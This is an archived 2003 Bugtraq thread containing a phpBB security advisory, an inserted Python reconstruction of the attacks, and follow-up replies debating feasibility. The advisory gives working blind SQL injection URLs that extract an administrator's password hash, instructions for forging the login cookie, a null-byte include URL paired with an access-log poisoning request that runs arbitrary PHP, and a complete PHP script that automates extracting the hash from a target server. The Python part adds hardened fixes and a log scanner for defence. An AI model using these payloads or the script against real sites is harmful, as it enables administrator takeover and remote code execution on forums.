91210 2003-02-21  02:38  /187 lines/ Lucas Armstrong <lucas@cgishield.com>
Imported: 2003-02-21  02:38  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3586>
Subject: phpBB Security Bugs
------------------------------------------------------------


phpBB Security Bugs 2-18-2003
http://CGIshield.com


Security Issue in phpBB 2.0, 2.01, 2.02 (Fixed in 2.03)

phpBB, the most popular open source bulletin board software on the
net, is vulnerable to a remotely exploitable SQL injection bug which
allows stealing an administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.

The actual attack is carried out via a select fish attack, by
manipulating the select query in the page_header.php file in order
to return users online based on certain criteria, such as characters
of their password hash.

For example, if the user is attempting to hack a user_id of '40' he
will request the following page:

http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid(user_password,1,1)=char(97)/*

The resultant query will be:

SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s 
WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND 
s.session_page = 1 or user_id=40 and mid(user_password,1,1)=char(97)/* 
ORDER BY u.username ASC, s.session_ip ASC

If a correct password hash digit is guessed, the admin's name will
show up as an online user, in the online user list at the bottom of
the forum page. After the password hash is determined, it is then
placed in the cookie and access is granted to the site.

So if the user_id is 32360 and the password hash is
6a204bd89f3c8348afd5c77c717a097a, then an attacker would take the
following value:

a:2:{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:5:"31360";}
www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *

urlencode() it, and place it in a cookie with the variable name
'phpbb2support_data', then access would be gained to the admin panel
on any phpbb site.

One could use a script to speed the process of exploiting this
vulnerability. Something similar to the script at the end of this
document.





Security issue in phpBB 1.4.x

phpBB, the most popular open source bulletin board software on the
net, is vulnerable to a remotely exploitable file manipulation
attack, which may allow an attacker to execute arbitrary php code on
the system.

It involves the following code which is located in auth.php:

include('language/lang_'.$default_lang.'.'.$phpEx);

This code strips all slashes from incoming user data, thereby
unescaping any user-supplied NULL bytes. An attacker can then supply
a null byte ('%00' when urlencoded), and any characters which come
after the null byte aren't treated as part of the file name. This is
because when the PHP interpreter reads the file name, it will stop
at the first null byte.

In this particular situation, the ability to poison the filename is
significant, because a user may then load any file on the system into
the interpreter and have PHP execute it. For example, if a user
selects a language of value:

'/../../../var/logs/apache/access.log%00',

the apache access.log will be included by this attack.

This flaw can be exploited by registering an account, logging in, and
then calling the following url (replace user=admin with the
registered name, and passwd=asdfasdf with the corresponding password):

http://localhost/phpBB/prefs.php?HTTP_POST_VARS[save]=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=1&lang=/../../../var/logs/apache/access.log%00&save=1&user=admin&submit=Save%20Preferences

What good is the ability to execute any file on the target server?
Well, consider if the attacker calls the url:

http://sitename.com/phpbb/index.php<?phpinfo();?> 

The PHP command is stored in the apache access.log file, and then
executed by the include() function, thereby allowing an attacker to
execute arbitrary PHP on any target server.

phpBB responded: "As for the 1.4.4 bug, we won't fix that. We've
said time and again that there are many security flaws in 1.4.4 and
that any sane webmaster should upgrade to 2.x. Please don't bother
searching for or notifying us of phpBB 1.x bugs."







<?php

########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David@cgishield.com

// To use this program, simply upload it to a php enabled webserver and execute.
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini.
// Also, replace the following with correct values:

$server = "192.168.1.100";
$script = "/phpbb2/index.php";
$the_userid_to_hack = "2";

// don't change this: the page shows this string only when the injected
// OR branch matched nothing, i.e. the guessed hex digit was wrong
$data_to_match = "In total there are <b>0</b> users online";

// MySQL char() codes for the sixteen hex digits of an md5 hash
$checkchar = array(
    '0' => "char(48)",  '1' => "char(49)",  '2' => "char(50)",  '3' => "char(51)",
    '4' => "char(52)",  '5' => "char(53)",  '6' => "char(54)",  '7' => "char(55)",
    '8' => "char(56)",  '9' => "char(57)",  'a' => "char(97)",  'b' => "char(98)",
    'c' => "char(99)",  'd' => "char(100)", 'e' => "char(101)", 'f' => "char(102)",
);

// one digit at a time: position $i of the 32-character hash, 16 candidates each
for ($i = 1; $i < 33; $i++) {
    foreach ($checkchar as $i2 => $i2val) {
        $vars = "forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$i2val/*";
        $data = sendToHost($server, 'post', $script, $vars);
        if ($data === '') {
            die("empty response from $server; aborting instead of misreading it as a hit");
        }
        if (stripos($data, $data_to_match) === false) {
            // the target showed up in the online list: digit $i is $i2
            echo "<br>$i= $i2";
            flush();
            break;
        }
    }
}

function sendToHost($host, $method, $path, $data, $useragent = 1)
{
    $method = strtoupper($method);
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        die("connect to $host failed: $errstr ($errno)");
    }
    fputs($fp, "$method $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    if ($useragent) {
        fputs($fp, "User-Agent: Mozilla\r\n");
    }
    fputs($fp, "Connection: close\r\n\r\n");
    if ($method == 'POST') {
        fputs($fp, $data);
    }
    $buf = '';
    while (!feof($fp)) {
        $buf .= fgets($fp, 128);
    }
    fclose($fp);
    usleep(10000);   // brief pause between requests (the original used an empty busy loop)

    return $buf;
}

?>

Vulnerability discovered by: David Zentner, david@cgishield.com
http://CGIshield.com
(91210) /Lucas Armstrong <lucas@cgishield.com>/(Rewrapped)
Comment in text 91338 by Konrad Rieck <kr@roqe.org>
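The select-fish extraction described in the advisory above, rebuilt as an added example in Python against an in-memory SQLite copy of the two tables. This is not the advisory's script and not phpBB code: the table layout, the admin row carrying the advisory's sample hash, the session rows and the timestamp are constructed here so it runs offline, and MySQL's mid() is written as substr(), which SQLite understands. The hardened variant casts forum_id to an integer and binds it, which is the shape of the fix; the extractor works one digit at a time, so it needs at most 16 queries per position and 512 in total.

```python
"""
Blind ("select fish") extraction of a phpBB 2.0 password hash, modelled in
Python over SQLite. Added example; the fixture data below is constructed.
"""
import sqlite3

SAMPLE_HASH = "6a204bd89f3c8348afd5c77c717a097a"  # the hash quoted in the advisory
HEX_DIGITS = "0123456789abcdef"
# The query page_header.php builds; only the forum_id value is attacker-controlled.
ONLINE_QUERY = (
    "SELECT u.username FROM phpbb_users u, phpbb_sessions s "
    "WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 "
    "AND s.session_page = {forum_id} ORDER BY u.username ASC, s.session_ip ASC"
)


def build_db():
    """Constructed fixture: an admin (user_id 40), one other member, two sessions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT);
        CREATE TABLE phpbb_sessions (session_user_id INTEGER, session_time INTEGER,
                                     session_page INTEGER, session_ip TEXT);
    """)
    db.executemany("INSERT INTO phpbb_users VALUES (?, ?, ?)", [
        (40, "admin", SAMPLE_HASH),
        (41, "bob", "f" * 32),
    ])
    db.executemany("INSERT INTO phpbb_sessions VALUES (?, ?, ?, ?)", [
        (-1, 2000000000, 1, "10.0.0.9"),   # the attacker's own guest session, forum 1
        (41, 2000000000, 2, "10.0.0.7"),   # bob is browsing forum 2
    ])
    return db


def online_users_vulnerable(db, forum_id):
    """Interpolates forum_id into the SQL, as the unpatched page_header.php does."""
    sql = ONLINE_QUERY.format(forum_id=forum_id)
    return sorted({row[0] for row in db.execute(sql)})


def online_users_fixed(db, forum_id):
    """Hardened form: cast to int and bind the value instead of interpolating it."""
    sql = ONLINE_QUERY.format(forum_id="?")
    return sorted({row[0] for row in db.execute(sql, (int(forum_id),))})


def extract_hash(db, user_id, oracle=online_users_vulnerable, length=32):
    """Recover the hash one hex digit at a time. Returns (hash, queries_sent).

    Nobody is online on forum 1 in the fixture, so a non-empty list means the
    injected OR branch matched: the guessed digit is right (the script's
    "0 users online" check, inverted).
    """
    recovered = ""
    queries = 0
    for pos in range(1, length + 1):
        for ch in HEX_DIGITS:
            # Same shape as the advisory's payload; '/*' comments out ORDER BY.
            payload = (f"1 or user_id={user_id} and "
                       f"substr(user_password,{pos},1)=char({ord(ch)})/*")
            queries += 1
            if oracle(db, payload):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no digit matched at position {pos}")
    return recovered, queries


def injection_rejected(db, payload):
    """True if the hardened query refuses the payload instead of running it."""
    try:
        online_users_fixed(db, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print(extract_hash(db, 40))
```

Swap the oracle for online_users_fixed and the loop stops at the first payload: int("1 or ...") raises before any SQL is built, which is the whole fix.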

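The null-byte include and the log-poisoning step from the 1.4.x section of the advisory, modelled as an added example in Python (not phpBB code, not from the advisory). It emulates the string PHP builds for include() and the truncation at the first NUL, adds the language-name check that closes the hole, and scans access-log lines for the two indicators an investigator would look for: a PHP open tag inside a request line and an encoded null byte in a parameter. The on-disk web root /phpBB (mirroring the URL path in the advisory) and the Apache log lines are assumptions constructed for this example.

```python
"""
Null-byte include truncation and access-log poisoning, modelled in Python.
Added example; WEB_ROOT and SAMPLE_ACCESS_LOG are constructed, not real.
"""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/phpBB"            # assumed on-disk location of the forum
PHP_EX = "php"                 # $phpEx in phpBB's config
LANG_NAME = re.compile(r"^[a-z][a-z0-9_]*$")
PHP_OPEN_TAG = re.compile(r"<\?")        # '<?phpinfo();?>' and '<?php ...' alike
NULL_BYTE = re.compile(r"%00|\x00")

# Constructed Apache common-log lines, not captured traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [21/Feb/2003:02:38:00 +0000] "GET /phpBB/index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Feb/2003:02:39:10 +0000] "GET /phpBB/index.php<?phpinfo();?> HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Feb/2003:02:39:12 +0000] "GET /phpBB/prefs.php?lang=/../../../var/logs/apache/access.log%00&save=1 HTTP/1.1" 200 312',
]


def include_target(default_lang):
    """Path that include('language/lang_'.$default_lang.'.'.$phpEx) actually opens.

    The request parameter is URL-decoded first (%00 becomes a NUL). PHP of that
    era handed the string to a C open(), which stops at the first NUL, so the
    '.php' suffix is dropped and the caller chooses the whole file name.
    """
    raw = "language/lang_" + unquote(default_lang) + "." + PHP_EX
    truncated = raw.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(WEB_ROOT, truncated))


def include_target_checked(default_lang):
    """Hardened form: accept only a plain language name before building the path."""
    if not LANG_NAME.match(default_lang):
        raise ValueError(f"invalid language name: {default_lang!r}")
    return include_target(default_lang)


def lang_rejected(default_lang):
    """True if the hardened builder refuses the value."""
    try:
        include_target_checked(default_lang)
    except ValueError:
        return True
    return False


def scan_access_log(lines):
    """Return (line_number, indicator) for lines carrying PHP code or a NUL byte."""
    hits = []
    for n, line in enumerate(lines, 1):
        if PHP_OPEN_TAG.search(line):
            hits.append((n, "php-open-tag"))
        if NULL_BYTE.search(line):
            hits.append((n, "null-byte"))
    return hits


if __name__ == "__main__":
    print(include_target("/../../../var/logs/apache/access.log%00"))
    print(scan_access_log(SAMPLE_ACCESS_LOG))
```

With the assumed web root, three '../' steps climb from /phpBB/language/lang_ to the filesystem root, which is why the advisory's payload reaches /var/logs/apache/access.log; on a deeper install the count of '../' changes but nothing else does. The scanner flags the poisoning request and the include request on separate lines because they are separate requests, which is also what makes the pair easy to correlate by client address.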
91338 2003-02-22  00:15  /31 lines/ Konrad Rieck <kr@roqe.org>
Imported: 2003-02-22  00:15  by Brevbäraren
External recipient: Lucas Armstrong <lucas@cgishield.com>
Recipient: Bugtraq (import) <3608>
Comment on text 91210 by Lucas Armstrong <lucas@cgishield.com>
Subject: Re: phpBB Security Bugs
------------------------------------------------------------
Hi Lucas & List, 

On Thu, 2003-02-20 at 21:37, Lucas Armstrong wrote:
> If a correct password hash digit is guessed, the admin's name will show up 
> as an online user, in the online user list at the bottom of the forum 
> page. After the password hash is determined, it is then placed in the 
> cookie and access is granted to the site.

I am just wondering... You are talking about guessing a 33-digit
hexadecimal number? 

Even if there are 1.000 admin passwords in the hash-space and you
succeed finding one after only searching 10% of space and you are
checking about 1.000.000 hashes per second. You won't finish until the
sun goes nova (which is rather impractical, especially for CPU-cooling).

I believe this is a theoretical attack against phpBB 2.0, but maybe I
missed some magic in the way phpBB generates these password hashes,
actually I haven't looked at the code.

Regards,
Konrad 

-- 
Konrad Rieck <kr@roqe.org> --------------------------------------------+
Roqefellaz, http://www.roqe.org - PGP: http://www.roqe.org/keys/kr.pub |
Fingerprint: 5803 E58E D1BF 9A29 AFCA  51B3 A725 EA18 ABA7 A6A3 -------+
(91338) /Konrad Rieck <kr@roqe.org>/----------------
Attachment (application/pgp-signature) in text 91339

91339 2003-02-22  00:15  /8 lines/ Konrad Rieck <kr@roqe.org>
Attachment filename: "signature.asc"
Imported: 2003-02-22  00:15  by Brevbäraren
External recipient: Lucas Armstrong <lucas@cgishield.com>
Recipient: Bugtraq (import) <3609>
Attachment (text/plain) to text 91338
Subject: Attachment (signature.asc) to: Re: phpBB Security Bugs
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (SunOS)

iD8DBQA+Vf1HpyXqGKunpqMRAh1TAJ48vXc8N2Po090Mg4+bQv/lAH58ggCfXdJy
przfiz56MEEYme82SH609mQ=
=pl6H
-----END PGP SIGNATURE-----
(91339) /Konrad Rieck <kr@roqe.org>/----------------

91371 2003-02-23  20:59  /100 lines/ Lucas Armstrong <lucas@cgishield.com>
Imported: 2003-02-23  20:59  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3617>
Subject: Re: phpBB Security Bugs
------------------------------------------------------------
In-Reply-To: <1045822791.7155.11.camel@fluffy>

Konrad,

This particular SQL Injection technique makes it possible to isolate
each hex digit in the md5 hash, and allows you to guess that digit's
particular value. Each digit would be guessed in 16 tries or
less. Since there are 32 digits in an md5 hash, there would be a
maximum number of 512 guesses to determine any particular password
hash. Again, the key to this exploit is isolating the guess to one
digit at a time, then moving on to the next digit, not trying to
guess the entire 32 digit string in one fell swoop which would
indeed take an incredible amount of time.

-David

(91371) /Lucas Armstrong <lucas@cgishield.com>/(Rewrapped)